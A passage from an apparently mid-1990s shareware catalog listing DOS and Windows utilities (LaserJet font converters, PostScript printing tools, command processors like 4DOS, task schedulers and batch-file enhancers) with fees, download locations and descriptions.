Mouse. + Registration fee: $29.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; disks + of other shareware. + Look for: availability unknown on BBSs; 2FNT.ZIP on CompuServe in + CIS:HP forum LIBrary 4. + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Converts PCX graphics to HP LaserJet soft fonts. Convert + scanned signatures, logos, letterhead, etc., then download and + print the font on any HP LaserJet or compatible printer from + within most major applications. Saves print time by downloading + often printed graphics as fonts only ONCE to your printer. + Includes conversion, download, & unload utilities. + + + Product: PCX2PCL + Author: TAXWARE + Version: v1.62 (07-01-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; HP LaserJet printer. + Registration fee: $29.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; disks + of other shareware. + Look for: availability unknown on BBSs; 2PCL.ZIP on CompuServe in + CIS:HP forum LIBrary 4. + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Converts PCX graphics to HP PCL format for use as graphic + macros on LaserJet and compatible printers. Convert scanned + signatures, logos, letterhead, etc. then download & print the + graphic macro from within most major applications. Saves print + time by downloading and storing complex graphics only ONCE as + printer macros (very much like fonts). Includes conversion, + download & unload utilities. + + + Product: Pulsar for Windows + LaserJet utility for Windows. See full description on page 93. + + Chapter 2, "Utilities" 114 + + + + Product: QFont + Author: Jamestown Software, 608-271-2090 + Version: 1.5 (10-20-90) + Needs: IBM AT (80286), DOS 2.1 or better. Hercules or EGA + monitor. Mouse. + Registration fee: $80.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Look for: QFONT*.* on BBSs (call 608-271-3685 to download it at + no charge); QFONT.* on CompuServe in CIS:IBMSYS forum LIBrary 7 + (or contact userID 74275,745 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Graphic "paint" program to edit and create HP Laserjet + downloadable soft fonts. Has complete editing functions - cut + and paste, circle, curves, arcs, lines, rectangles, fills and + so on - plus powerful transformation functions such as shadow, + outline, bolden, lighten, slant and resize. Modify font + headers. Test spacing. Download fonts with sample printouts. + Change mono spaced fonts to proportional and vice versa. Use + fonts in DTP programs like Ventura, or wordprocessors such as + WordPerfect. + + + Product: Top Fonts Sampler + A collection of eight TrueType scalable fonts. See full + description on page 141. + + Product: TSR Download + Soft font manager for LaserJets & DeskJets. See full + description on page 90. + + 2.4.5.4 PostScript + + Product: ESF's TrueType Collection 1 + Ten TrueType fonts plus tutorial & setup. See full description + on page 138. + + Product: LPRINT + Author: Paragon Innovations, Inc. + Version: 2.1 (02-22-94) + Needs: IBM PC, DOS 3.0 or better. 100k RAM; Postscript printer. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 6 months of fax, CompuServe, mail support; bonus + utilities; bonus templates. 6-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Takes advantage of the advanced graphic capabilities of + PostScript when printing listings or other ASCII text files. + * Process text to print on printer + + Chapter 2, "Utilities" 115 + + + + * Select any font or print size + * Select portrait or landscape orientation + * Handles embedded formfeeds + * Encloses text in a border with a title block (TB) + * Prints company name, logo, pathname in TB + * Gets TB data from document + * Gets username from DOS SET + * Page numbering + * Counts words, lines, pages + + + Product: Over_LAZ PS + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 3 (01-15-93) + Needs: IBM PC, DOS 2.0 or better. Postscript printer. + WordPerfect 5.x, WordStar, PC-Write, dBase. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of support; bonus templates. + Look for: availability unknown on BBSs; OVERPS.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 2 (or contact userID 72060,1153 for + assistance); OVERPS.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID MIKLOS.G for assistance). + Download size: 117k (about nine minutes with a 2400 baud modem) + Description: + A collection of over 75 printer overlay files for WordPerfect + 5.0 or later, WordStar, PC-Write, dBase and other applications + and a PostScript compatible printer. Over_LAZ are provided for + standard office forms (inter office memo, FAX transmittal, etc) + as well as rubber stamps (draft, confidential, etc) and + decorative page borders. Over_LAZ PS are automatically printed + on the page over your document. + + + Product: PS-SLEEVE + Author: JMJ Software, 704-525-1472 + Version: 2.0 (03-01-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; Postscript printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP on CompuServe in CIS:DTP + forum LIBrary 6 (or contact userID 75160,2530 for assistance); + SLEEVE.ZIP on GEnie in PSRT forum LIBrary 1. + Download size: 26k (about two minutes with a 2400 baud modem) + Description: + Print 51/4" or 31/2" floppy disk storage sleeves on your PostScript + printer. Just insert a floppy disk in Drive A or B and print a + sleeve template on your printer containing up to 192 file names + in all subdirectories on the floppy. Cut it apart, tape or + + Chapter 2, "Utilities" 116 + + + + glue the flaps, and you're done. Don't get writer's cramp + writing all those tiny file names. + + + Product: Top Fonts Sampler + A collection of eight TrueType scalable fonts. See full + description on page 141. + + + 2.5 System utilities + + 2.5.1 Operating systems + + See also: Utilities, Software tools & add-ins, For operating + systems. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 559. + + Product: Free System Resources + Notification of low memory resources. See full description on + page 69. + + Product: System Monitor + Author: Rosenthal Engineering, 805-541-0910 + Version: 3.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: SYSMON30.ZIP on BBSs (multiple files) (call + 805-258-6172 to download it at no charge). + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Monitors and reports problems early, maintains performance, + resolves hardware/software and MS-Windows conflicts. Strong + virus defense, with support for single and LAN users. Each time + the computer s used, it re-evaluates the system by testing and + extensively monitoring a number of performance and security + indicators. Computer consultants and service organizations can + include an optional message to advertise and promote their + support services. + + + Product: ToolBOX + A simple yet uniquely powerful DOS shell. See full description + on page 25. + + Chapter 2, "Utilities" 117 + + + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 123. + + 2.5.1.1 Task-switching + + Product: LegRoom + Author: Ivden Technologies, Inc., 610-328-1145 + Version: 3.0 (02-06-95) + Needs: IBM PC, DOS 2.0 or better. 1k RAM; CGA monitor; Hercules + monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; EMS memory; XMS memory. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6). 1 free update disk(s) sent out. + Look for: LGROOM30.ZIP on BBSs (call 215-322-5114 to download it + at no charge); LGROOM.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 3 (or contact userID 71221,3602 for assistance). + SWREG#: 2833 + PsL#: 11409 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A TSR which lets you press a 'hot key' to shell to DOS from + virtually any application (text or graphic) and reclaim almost + all of your conventional memory for running big programs. Works + with programs that don't have a built-in DOS shell feature. + Lets you turn any program, even a batch file, into a TSR - + without any programming! Can use extended and expanded memory. + Supports concurrent users on a LAN. Create pop-up command + menus. + + + 2.5.2 Multi-OS utilities + + See also: Utilities, Software tools & add-ins, For operating + systems. + + Product: 4FILES [***] + File manager, annotator and program launcher. See full + description on page 35. + + Chapter 2, "Utilities" 118 + + + + Product: ABcmd + Author: Abri Technologies, Inc. + Version: 1.0 (03-15-94) + Needs: IBM 80386, Windows 3.1 or better. 35k RAM. + Registration fee: $15.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; ABCMD.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 4 (or contact userID 72345,1623 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + A real handy Windows command line with up front, intuitive, + easy-to-use controls. Features history, common dos commands, + multiple commands per line, 10 memory buttons for command line + storage, alarm function for time/date reminders or program + execution. Compact, all-in-one, 35k size doesn't clutter up + disk. + + + Product: Bootit + Author: TeraByte Unlimited + Version: 1.01 (05-22-95) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; Hard + disk. + Registration fee: $17.95 (add $9.95 for shipping to Canadian + addresses) (add $9.95 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; bonus + utilities; discounts on upgrades. 2-month free upgrading + allowed. + Look for: availability unknown on BBSs; BOOTIT.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 4 (or contact userID 70751,3507 for + assistance). + SWREG#: 5923 + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + Lets you have up to ten "master" partitions per hard drive, + instead of the standard four. This allows you to install + multiple operating systems and easily select which one you want + to boot. Also allows you to "fill" the standard partition + table (the one that only allows four partitions) with up to + three of your choice; for example, you could boot Windows NT + and have two DOS partitions. You can also enter hard drive + specifications to override the BIOS and/or swap drives. + + + Product: CEnvi + Simple C-interpreter to enhance batch files. See full + description on page 472. + + Chapter 2, "Utilities" 119 + + + + Product: COMpanion + DOS personal network for up to 5 PCs. See full description on + page 428. + + Product: JRchive + Royalty-free file compression/archiving util. See full + description on page 49. + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 193. + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 228. + + 2.5.3 Command processors + + Product: 4DOS + Author: JP Software Inc., 617-646-3975 + Version: 5.0 (11-23-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: Hard disk. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: 4DOS*.ZIP on BBSs (multiple files) (call 617-354-7077 + to download it at no charge); 4DOS*.ZIP on CompuServe in + CIS:PCVENB forum LIBrary 10 (multiple files) (or contact userID + 75020,244 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Awards & nominations: 1989 finalist, PC Magazine Technical + Excellence Awards. 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1992 winner, Shareware Industry + Awards. 1989 winner, Public Brand Software contests for useful + programs. + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. Enhances the + commands you're used to working with and then adds over 50 new + commands. It offers the power and flexibility you need, so + that you'll actually prefer the command line for certain tasks. + Because it only replaces COMMAND.COM, the rest of your software + works just as it always has. Try it and find out why users + love this refreshing, innovative command processor! + + Chapter 2, "Utilities" 120 + + + + Product: 4DOS for Windows NT + Author: JP Software Inc., 617-646-3975 + Version: 2.0 (01-24-94) + Needs: IBM 80386, Windows NT 3.1 or better. + Registration fee: $79.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + fax, BBS, CompuServe, newsletter, mail support; 3-month return + policy; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: 4NTX.ZIP on BBSs (multiple files) (call 617-354-7077 to + download it at no charge); 4NT*.ZIP on CompuServe in CIS:PCVENB + forum LIBrary 10 (multiple files) (or contact userID 75020,244 + for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. It is a refreshing + replacement for the Windows NT command shell, CMD.EXE. Enhances + most Windows NT commands, and adds over 50 of its own. It + supports all disk formats, including FAT, HPFS, and NTFS. It's + fully compatible with traditional commands, so there isn't a + new language to learn. If you've ever been frustrated by the + limitations of the command line, try this. + + + Product: 4OS2 + Author: JP Software Inc., 617-646-3975 + Version: 2.0 (12-16-93) + Needs: IBM AT (80286), OS/2 1.0 or better. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 3-month return policy; disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: 4OS2X.ZIP on BBSs (multiple files) (call 617-354-7077 + to download it at no charge); 4OS2*.ZIP on CompuServe in + CIS:PCVENB forum LIBrary 10 (multiple files) (or contact userID + 75020,244 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. An innovative + replacement for the OS/2 command shell CMD.EXE, it enhances + most commands and adds over 50 of its own. Commands offer you + the power and flexibility you need so you'll actually prefer + the command line for certain tasks. It supports all disk + formats, including FAT and HPFS. If you've ever been left + + Chapter 2, "Utilities" 121 + + + + frustrated by the limitations of the command line, then try + this. + + th + Product: 6 Sense - DOS 6 Utilities + Author: Tay-Jee Software, 703-261-7023 + Version: 2.1 (07-23-93) + Needs: IBM PC, DOS 5.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. Collection of DOSKEY + macros. + Look for: DOSUTL??.ZIP on BBSs; DOSUTL.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 72330,1776 for + assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Menu-driven utilities for configuring the various switches in + the new DIR and FORMAT commands. Allows you to easily select + just the options you need. You can then either execute the + command directly with the options you have specified, or store + the options in an environment variable to make the changes + permanent. Both programs feature context-sensitive help and + complete access to all documented (and some undocumented) + command features. + + + Product: ABmenu + Fast/easy, program menu and directory changer. See full + description on page 196. + + Product: CEnvi + Simple C-interpreter to enhance batch files. See full + description on page 472. + + Product: CMFiler + File manager. See full description on page 191. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 188. + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 193. + + Chapter 2, "Utilities" 122 + + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 217. + + Product: Task Scheduler for DOS + Author: Simian Id Software, 314-781-8709 + Version: 2.5 (08-01-93) + Needs: IBM PC, DOS 3.0 or better. 3k RAM. + Registration fee: $35.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; discounts on upgrades. + Look for: SCHEDTSK.ZIP on BBSs (call 314-638-3041 to download it + at no charge); SCHEDT.ZIP on CompuServe in CIS:DOS SHAREW forum + LIBrary 9 (or contact userID 73613,3606 for assistance). + SWREG#: 1855 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + A Task and Event manager which will schedule and run any + programs. This means you can run unattended backups or other + processes any time of the day or night just by setting the date + and time, and listing the programs to be run. Programs can be + run once, daily, weekly, monthly, or at an interval you set! + The TSR only requires 2.5K when resident. + + + Product: TOP + Author: TNC Technology, 716-872-1377 + Version: 2.0 (11-15-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $50.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 36 months of phone, fax, BBS, CompuServe, mail + support; 12-month return policy; bonus utilities; all ASP-wide + offers (see page 6). 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: TOP200.ZIP on BBSs (call 716-872-4913 to download it at + no charge); TOP200.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 1 (or contact userID 70403,2351 for assistance). + Download size: 351k (about 26 minutes with a 2400 baud modem) + Description: + Improves DOS commands without sacrificing the command line! + Adds command history, file management, program scheduling, + aliasing, menus, mouse, 4000+ lines of on-line help, much more! + Most commands can be accessed through pop-up windows with mouse + "drag and drop" between windows, screen and command line. Pop- + up windows can be displayed while you type, including help! + Screen savers, custom colors, super VGA modes, can use EMS or + XMS. The color DIR utility alone has over 35 options. + + Chapter 2, "Utilities" 123 + + + + Product: WinKillr + Author: Open Windows, 719-531-0403 + Version: 1.0 (05-28-95) + Needs: IBM 80386, Windows 3.1 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of + CompuServe, mail support; lifetime return policy; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. CompuServe Membership + Offer. + Look for: KILLR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge). + Download size: 179k (about 14 minutes with a 2400 baud modem) + Description: + New!! Timed Program Terminator - Designed to "terminate" + programs at a specific time, time/date or after a specified + elapsed time. Will Save open files and "Save As" open files + that have not yet been named. Don't let that e-mail client you + forgot to "kill" at work lock you out again! + + + Product: WizManager + Fantastic File Manager add-on. See full description on + page 195. + + 2.5.4 Batch & macro utilities + th + Product: 6 Sense - DOS 6 Utilities + Handy utilities for DOS 5.00+. See full description on + page 121. + + Product: ACTION Process Automator + Author: Redei Enterprises, 310-832-6984 + Version: 1.0 (03-28-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + VBRUN300.DLL. + Strongly recommended: SVGA monitor; Network (LAN); XMS memory; + math coprocessor. + Registration fee: $79.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 1690k (about 126 minutes with a 2400 baud modem) + Description: + Appears iconized when Windows is loaded and takes charge over + predetermined tasks, triggering them whenever they are + scheduled to occur. Just click the icon to add, delete, edit, + view or test actions. It can copy, rename, move files and + + Chapter 2, "Utilities" 124 + + + + directories, start applications,play macros, zip and unzip + archives, attach servers, map drives, reboot, restart. + + + Product: A Batch View + Author: Robin R. Latham, 817-263-4056 + Version: 1.1 (09-30-93) + Needs: IBM PC, DOS 3.0 or better. 32k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). 24-month free + upgrading allowed. 24 free update disk(s) sent out. + Look for: ABATVIEW.ZIP on BBSs; ABTVEW.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 72614,602 for + assistance). + Download size: 138k (about ten minutes with a 2400 baud modem) + Description: + Eight programs make up a utility set designed to enhance your + batch Files. Operates in color or monochrome text modes. A pop- + up menu program with selectable colors, shadowing, text or + ASCII code wallpapered backgrounds, 48 selections. A pop-up + message program (same options) with system info. DOS echo + replacement for color text and graphic symbols. Scrolling + messages/billboard marquee program. (multi-option) color screen + clearing, information, system utility programs. Text file + viewer + + + Product: BATUTIL + Author: CTRLALT Associates + Version: 4.0 (12-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $43.00 + Registration benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 3 (or contact userID 76004,1664 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Lets you spiff up your batch files with accesss to hardware + information, display of text in color and/or large letters, pop + up menus and file lists. You can directly access the + environment and have paths up to 255 characters long. PC + Magazine called it the 'ultimate batch enhancer' and PC World + and PC Computing included it in "Best of.." articles. Has a + full fledged language with if..then, case, etc. + + Chapter 2, "Utilities" 125 + + + + Product: CEnvi + Simple C-interpreter to enhance batch files. See full + description on page 472. + + Product: Command Post + Grand old lady of Windows shells. See full description on + page 185. + + Product: ENVI_MAN + Author: MicroMetric, 813-377-2515 + Version: 1.10 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: EMAN110.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + An environment utility that accomplishes two major function. + First - display all current environment strings and data about + the environment such as the location, size and space + availability of the Master environment. Second - let a batch + file know how much environment space is currently available and + to provide a graceful exit if there isn't enough. It may also + show under certain circumstances the size of the master + environment can be expanded without changes being made to + CONFIG.SYS. + + Chapter 2, "Utilities" 126 + + + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Author: Seaware Corp., 407-738-1712 + Version: 4.08 (04-12-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $79.00 (add $3.00 for shipping to U.S. + addresses) (add $12.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 51/4" + master disk(s); 6 months of phone, BBS, newsletter support; + 1-month return policy; bonus utilities. + Look for: EBL.ZIP on BBSs (call 407-738-1843 to download it at no + charge); EBL*.ZIP on CompuServe in CIS:IBMSYS forum LIBrary 1 + (or contact userID 71426,204 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Makes your batch files hum! Adds professional extensions to + existing MS-DOS batch files to: + v/ Integrate and automate programs to work together + v/ Speed batch files up to 5 times faster + v/ Add structured IF, REPEAT, WHILE, BEGIN/END commands + v/ Create menus automatically + v/ Design professional user interfaces (windows, several menu + types, sound, and more) + v/ Add over 100 commands, functions, and expression types + Using batch files will never be the same. + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 37. + + Product: FileMod + Author: Lincoln Beach Software, 314-861-1500 + Version: 1.2 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: FILEMD12.ZIP on BBSs (call 317-784-2147 to download it + at no charge); FILEMD.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 0 (or contact userID 70700,630 for assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + Can make modifications to your systems files from within a + batch file or at the command line. Updates FILES, BUFFERS, + PATH, add/remove lines, modify parameters, remark out lines and + more.... + + Chapter 2, "Utilities" 127 + + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 142. + + Product: MENU_MAN + Author: MicroMetric, 813-377-2515 + Version: 2.00 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: MMAN200.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Allows the display of user selection menus from within batch + files. These menus are controlled by command line options and + can contain a title and up to nineteen selection option lines + that are generated from REM lines in the batch file which + follows the call to MENU-MAN. Options include either selection + or check-box menus, a user response time limit, menu + positioning, erasing the screen before/after menu display, and + menu sound, color and type customization. + + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 38. + + Product: PALERT + Author: Patri-Soft, 909-352-2820 + Version: 2.4 (10-22-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PALERT24.ZIP on BBSs (call 714-352-2825 to download it + at no charge). + Download size: 27k (about two minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A batch file utility designed to check your disk freespace + before starting an application. Specify how much disk + freespace you need for a program and it insures you have it + before starting an application. Don't be caught in your + wordprocessor or spreadsheet with a file that is too big to be + saved. Put it in your AUTOEXEC.BAT file to warn you when your + + Chapter 2, "Utilities" 128 + + + + hard disk is getting full. Presents a graphical representation + of space to let you quickly determine freespace levels. + + + Product: PATH_MAN + Author: MicroMetric, 813-377-2515 + Version: 1.15 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: PMAN115.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + A utility that searches the directory path elements of the PATH + statement for a given file. The search file name may include + DOS wildcard characters. The ERRORLEVEL variable is set, based + on the results of this search, to allow more user friendly + batch files - a graceful exit can be made when needed data + files or programs are missing. Optionally, the path element on + which the search file is located may be displayed. + + + Product: PDAILY + Author: Patri-Soft, 909-352-2820 + Version: 1.0 (10-10-86) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $14.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PDAILY.ZIP on BBSs (call 909-352-2825 to download it at + no charge); PDAILY.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 1 (or contact userID 76347,2477 for assistance). + Download size: 11k (about one minute with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets users execute one or more DOS batch commands once per day. + Use it when you execute a batch command multiple times per day + but want selected commands to execute only once. For instance + backup or disk cleanup. Can be implemented in your + AUTOEXEC.BAT file. + + + Product: QIC-BAT for CMS + Enhancement software for Colorado tape drives. See full + description on page 42. + + Chapter 2, "Utilities" 129 + + + + Product: STACKEY + Keystroke stacking utility. See full description on page 71. + + Product: STEENBURGH's STUFF + Author: Tay-Jee Software, 703-261-7023 + Version: 3.0 (07-01-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $19.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. + Look for: SSTUFF??.ZIP on BBSs; SSTUFF.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 0 (multiple files) (or contact userID + 72330,1776 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A collection of 21 batch file utilities. BATBOX is a simple but + useful menu system. CHKPRN returns printer status. CLK reports + the time/date with billions of formatting options. DOSVER + reports the DOS version (via errorlevel). INPUT displays fancy + prompts and accepts input. MUSIC plays transcribed sheet music, + while SOUNDER produces billions of different random tones. + Support for direct manipulation of environment variables. Many + other useful functions provided. Supports EGA/VGA. + + + Product: Task Scheduler for DOS + Schedule task/programs to run anytime. See full description on + page 122. + + Product: WinBatch + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 4.0 (10-31-92) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; Hard + disk; Mouse. + Registration fee: $69.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6). + Look for: WB-40L.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WB-40L.ZIP on CompuServe in CIS:WILSON forum + LIBrary 15 (or contact userID 76702,1072 for assistance). + Download size: 700k (about 52 minutes with a 2400 